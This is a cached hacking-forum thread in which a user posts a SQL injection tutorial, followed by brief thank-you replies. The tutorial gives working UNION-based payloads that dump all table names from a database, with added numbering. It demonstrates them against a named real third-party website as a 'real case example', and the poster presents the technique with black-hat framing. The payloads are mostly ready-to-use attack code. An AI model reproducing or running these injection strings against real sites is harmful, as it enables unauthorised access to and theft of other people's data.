<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3590961" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3590961" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3590961</a>. It is a snapshot of the page as it appeared on 2 Apr 2014 13:54:47 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3590961" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:xwqgDAMpJ5sJ:www.hackforums.net/showthread.php%3Ftid%3D3590961&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] numbering tables/columns in "dump in one shot" syntax - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] numbering tables/columns in &quot;dump in one shot&quot; syntax"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3590961"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-02-2014, 05:54 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] numbering tables/columns in "dump in one shot" syntax</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (3):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3590961" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/rating.js"></script><div id="success_rating_3590961" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3590961"><li style="width: 0%" class="current_rating" id="current_rating_3590961">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3590961&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3590961&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3590961&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3590961&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3590961&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3590961" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3590961_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3590961" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3590961&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3590961");
// -->
</script><div><strong>[SQLi tutorial] numbering tables/columns in "dump in one shot" syntax</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid33665320" id="pid33665320"></a><table class="tborder" style="border-top-width: 0; " id="post_33665320" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-01-2013, 03:38 PM <span id="edited_by_33665320"><span class="smalltext">(This post was last modified: 07-01-2013 03:41 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33665320#pid33665320">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,188<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33665320">I was writing about "dump in one shot" syntax in different tutorials:<br><br><a href="http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/" target="_blank">http://zentrixplus.net/forum/index.php?/...-one-shot/</a><br><a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank">http://www.hackforums.net/showthread.php?tid=3487536</a><br><a href="http://www.hackforums.net/showthread.php?tid=3532481" target="_blank">http://www.hackforums.net/showthread.php?tid=3532481</a><br><a href="http://www.hackforums.net/showthread.php?tid=3567217" target="_blank">http://www.hackforums.net/showthread.php?tid=3567217</a><br><br>One of the task in challenge <a href="http://www.hackforums.net/showthread.php?tid=3562988" target="_blank"><span style="text-decoration: underline;"><span style="font-size: medium;">#50</span></span></a>
 is numbering all tables in database. We can use ascending or descending
 order. On picture bellow we see descending numbering order.<br><img title="" src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/72268542cb5668883a0b6e0edc7321b1.jpg" alt="[Image: 72268542cb5668883a0b6e0edc7321b1.jpg]" border="0"><br><br>I see from your PMs that numbering part is interesting for many of you so here is a quick tutorial about it.<br><br>We
 can use that numbering part at displaying all databases, displaying all
 tables, displaying all columns in some table... It is only cosmetics 
for your output but because you are asking so much here is how to do it <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>We already know <span style="color: #32CD32;"><a href="http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/" target="_blank"><span style="text-decoration: underline;">dump in one shot</span></a></span> syntax for displaying all tables in database:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select
 (@x) from (select (@x:=0x00), (select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in (@x:=concat(@x,0x3c62723e,table_name))))x)</code></div></div><br><span style="color: #FFA500;"><span style="font-weight: bold;">Real case example:</span></span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.ece.com.tw/p-detail.php?id=12
 and 0 UNION SELECT 1,2,3,4,(select (@x) from (select (@x:=0x00), 
(select (0) from (information_schema.tables) where 
(table_schema=database()) and (0x00) in 
(@x:=concat(@x,0x3c62723e,table_name))))x)<br>,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -&amp;cID=2&amp;uID=1</code></div></div><br>and we get:<br><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/b903f6bef9b50a51cd9d771da0fae7df.jpg" alt="[Image: b903f6bef9b50a51cd9d771da0fae7df.jpg]" border="0"><br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">Adding ascending tables numbering</span></span></span><br><br>We
 want our tables in output to be numbered from 1 to XX where XX is 
number of tables in some database. We will add new local variable <span style="color: #32CD32;">running_number</span> to our command and initialized it with value <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #32CD32;">0</span></span></span>. In the part just before table_name in our command we will add this code:<br><br>(@running_number:=@running_number<span style="color: #00BFFF;">%2b</span><span style="color: #32CD32;"><span style="font-size: medium;"><span style="font-weight: bold;">1</span></span></span>)<br><br><span style="color: #00BFFF;">%2b</span> is plus sign (<span style="font-weight: bold;"><span style="color: #FFD700;"><span style="font-size: medium;">+</span></span></span>) in hex value. We are adding <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">+</span><span style="color: #32CD32;">1</span></span></span> to our local variable <span style="color: #32CD32;">running_number</span><br><br>After that part we will add period <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">.</span></span></span> and <span style="font-weight: bold;"><span style="color: #FFD700;">space</span></span> in hex <span style="color: #00BFFF;">0x2e20</span> so there will be period and space right after number for nicer output.<br><br>Our command for ascending numbering will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.ece.com.tw/p-detail.php?id=12 and 0 UNION SELECT 1,2,3,4,<br>(select
 (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in 
(@x:=concat(@x,0x3c62723e,(@running_number:=@running_number%2b1),0x2e20,table_na
​me))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
-&amp;cID=2&amp;uID=1</code></div></div><br><br>and result of this command will be:<br><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/99bf97fac9cbd83153cf459f53271043.jpg" alt="[Image: 99bf97fac9cbd83153cf459f53271043.jpg]" border="0"><br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">Adding descending tables numbering</span></span></span><br><br>We want our tables in output to be numbered from XX down to 1 where XX is number of tables in some database.<br><br>Here we initialize our local variable <span style="color: #32CD32;">running_number</span> with count of all tables in database like:<br>(@running_number:=(select count(*) from information_schema.tables where table_schema=database())<span style="color: #00BFFF;">%2b</span><span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #32CD32;">1</span></span></span>)<br><br><span style="color: #00BFFF;">%2b</span> is plus sign (<span style="font-weight: bold;"><span style="color: #FFD700;"><span style="font-size: medium;">+</span></span></span>) in hex value. We add <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">+</span><span style="color: #32CD32;">1</span></span></span> to total tables count because in <span style="color: #32CD32;"><a href="http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/" target="_blank"><span style="text-decoration: underline;">dump in one shot</span></a></span> command we will substract that value by <span style="font-weight: bold;"><span style="color: #32CD32;"><span style="font-size: medium;">1</span></span></span> in each iteration like:<br>(@running_number:=@running_number<span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #32CD32;">-1</span></span></span>)<br><br>so our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.ece.com.tw/p-detail.php?id=12
 and 0 UNION SELECT 1,2,3,4,(select (@x) from (select (@x:=0x00), 
(@running_number:=(select count(*) from information_schema.tables where 
table_schema=database())%2b1), (select (0) from 
(information_schema.tables) where (table_schema=database()) and (0x00) 
in 
(@x:=concat(@x,0x3c62723e,(@running_number:=@running_number-1),0x2e20,table_name))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
 -&amp;cID=2&amp;uID=1</code></div></div><br>and that command will give us result:<br><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/807e4c40e0c7344d5e0938ee848bc6e2.jpg" alt="[Image: 807e4c40e0c7344d5e0938ee848bc6e2.jpg]" border="0"><br><br>For numbering columns we only change the <span style="color: #32CD32;"><a href="http://zentrixplus.net/forum/index.php?/topic/592-tutorial-sqli-dump-data-in-one-shot/" target="_blank"><span style="text-decoration: underline;">dump in one shot</span></a></span> command to display columns from selected table. I will leave that part for your home work.<br><br>As you see adding databases/tables/columns numbering was quite easy <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>Another part of challenge <a href="http://www.hackforums.net/showthread.php?tid=3562988" target="_blank"><span style="text-decoration: underline;"><span style="font-size: medium;">#50</span></span></a> is explained.<br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_33665320"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33665320" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33666118" id="pid33666118"></a><table class="tborder" style="margin-top: 5px; " id="post_33666118" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-01-2013, 04:17 PM <span id="edited_by_33666118"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33666118#pid33666118">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1860806"><span style="color:#383838">Exusia</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 15<br>Posts: 257<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1860806"><strong class="reputation_negative">-1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33666118">Nice tutorial ajkaro, thanks for explaining :)</div><div class="post_meta" id="post_meta_33666118"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1860806" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33666118" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33666263" id="pid33666263"></a><table class="tborder" style="margin-top: 5px; " id="post_33666263" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-01-2013, 04:25 PM <span id="edited_by_33666263"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33666263#pid33666263">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1873414"><span style="color:#383838">urez</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 2<br>Posts: 108<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1873414"><strong class="reputation_negative">-19</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33666263">good tutorial, was stumped on this today thank you</div><div class="post_meta" id="post_meta_33666263"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1873414" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33666263" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33681484" id="pid33681484"></a><table class="tborder" style="margin-top: 5px; " id="post_33681484" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-02-2013, 10:17 AM <span id="edited_by_33681484"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33681484#pid33681484">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1834662"><span class="group2">Nerd_XSS</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 4<br>Posts: 57<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1834662"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33681484">Interesting..<br><br>Thanks for the explanation :)</div><div class="post_meta" id="post_meta_33681484"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1834662" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33681484" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33698061" id="pid33698061"></a><table class="tborder" style="margin-top: 5px; " id="post_33698061" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-03-2013, 04:39 AM <span id="edited_by_33698061"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3590961&amp;pid=33698061#pid33698061">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1849363"><span class="group9">Blad</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">L33t Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20numbering%20tables_columns%20in%20%27dump%20in%20one%20shot%27%20syntax%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 18<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1849363"><strong class="reputation_positive">2</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33698061">Nice tutorial dude, works really well. thanks.</div><div class="post_meta" id="post_meta_33698061"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1849363" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3590961&amp;replyto=33698061" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid33698106" id="pid33698106"></a><table class="tborder" style="margin-top: 5px; " id="post_33698106" border="0" cellpadding="4" 